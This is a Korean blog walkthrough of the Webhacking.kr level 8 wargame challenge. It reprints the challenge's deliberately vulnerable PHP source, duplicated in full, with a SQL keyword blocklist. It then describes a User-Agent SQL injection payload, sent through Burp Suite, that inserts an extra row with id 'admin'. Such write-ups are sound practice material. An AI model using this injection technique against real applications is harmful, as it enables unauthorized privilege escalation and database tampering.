Web_Hacking/Webhacking.kr
[Web_Hacking] Webhacking.kr 8
MitNy
2017. 3. 27. 13:36
8번 문제는 새로고침을 누르면 done! (0/70) 의 카운트가 올라가는데
문제 푸는데는 별 상관이 없는거 같다..
이 첫 페이지 소스를 보면 index.phps가 주석 처리 되어있고
index.phps에 들어가보면
<?
$agent=getenv("HTTP_USER_AGENT");
$ip=$_SERVER[REMOTE_ADDR];
$agent=trim($agent);
$agent=str_replace(".","_",$agent);
$agent=str_replace("/","_",$agent);
$pat="/\/|\*|union|char|ascii|select|out|infor|schema|columns|sub|-|\+|\||!|update|del|drop|from|where|order|by|asc|desc|lv|board|\([0-9]|sys|pass|\.|like|and|\'\'|sub/";
$agent=strtolower($agent);
if(preg_match($pat,$agent)) exit("Access Denied!");
$_SERVER[HTTP_USER_AGENT]=str_replace("'","",$_SERVER[HTTP_USER_AGENT]);
$_SERVER[HTTP_USER_AGENT]=str_replace("\"","",$_SERVER[HTTP_USER_AGENT]);
$count_ck=@mysql_fetch_array(mysql_query("select count(id) from lv0"));
if($count_ck[0]>=70) { @mysql_query("delete from lv0"); }
$q=@mysql_query("select id from lv0 where agent='$_SERVER[HTTP_USER_AGENT]'");
$ck=@mysql_fetch_array($q);
if($ck)
{
echo("hi <b>$ck[0]</b><p>");
if($ck[0]=="admin")
{
@solve();
@mysql_query("delete from lv0");
}
}
if(!$ck)
{
$q=@mysql_query("insert into lv0(agent,ip,id) values('$agent','$ip','guest')") or die("query error");
echo("<br><br>done! ($count_ck[0]/70)");
}
$agent=getenv("HTTP_USER_AGENT");
$ip=$_SERVER[REMOTE_ADDR];
$agent=trim($agent);
$agent=str_replace(".","_",$agent);
$agent=str_replace("/","_",$agent);
$pat="/\/|\*|union|char|ascii|select|out|infor|schema|columns|sub|-|\+|\||!|update|del|drop|from|where|order|by|asc|desc|lv|board|\([0-9]|sys|pass|\.|like|and|\'\'|sub/";
$agent=strtolower($agent);
if(preg_match($pat,$agent)) exit("Access Denied!");
$_SERVER[HTTP_USER_AGENT]=str_replace("'","",$_SERVER[HTTP_USER_AGENT]);
$_SERVER[HTTP_USER_AGENT]=str_replace("\"","",$_SERVER[HTTP_USER_AGENT]);
$count_ck=@mysql_fetch_array(mysql_query("select count(id) from lv0"));
if($count_ck[0]>=70) { @mysql_query("delete from lv0"); }
$q=@mysql_query("select id from lv0 where agent='$_SERVER[HTTP_USER_AGENT]'");
$ck=@mysql_fetch_array($q);
if($ck)
{
echo("hi <b>$ck[0]</b><p>");
if($ck[0]=="admin")
{
@solve();
@mysql_query("delete from lv0");
}
}
if(!$ck)
{
$q=@mysql_query("insert into lv0(agent,ip,id) values('$agent','$ip','guest')") or die("query error");
echo("<br><br>done! ($count_ck[0]/70)");
}
?>
$agent 변수에 USER-AGENT 값을 넣고 필터링 검사를 하는데, id가 admin일 때 문제가 풀린다.
$agent,$ip,id를 insert 쿼리로 데이터베이스에 넣어주는데 quest로 되어있어서 admin으로 어떻게 만들까 고민을 했는데
insert 쿼리는 values에 콤마를 사용해 여러개의 데이터를 집어넣을 수 있다.
insert into lv0('(아무값)','127.0.0.1','admin') values('(아무값','$ip','guest')
agent에 인젝션을 해야 하므로
Burp Suite를 이용해 User-Agent에 (아무값)','127.0.0.1','admin'),('아무값 을 넣어 Forward 해준다.
그러면 데이터베이스에 (아무값) 127.0.0.1 admin , (아무값) 127.0.0.1 guest 2개가 동시에 생성되었을 것이다.
다시 User-Agent에 방금 데이터베이스에 생성한 admin값을 가지는 아무값을 넣어 Forward 해주면 문제가 풀린다.
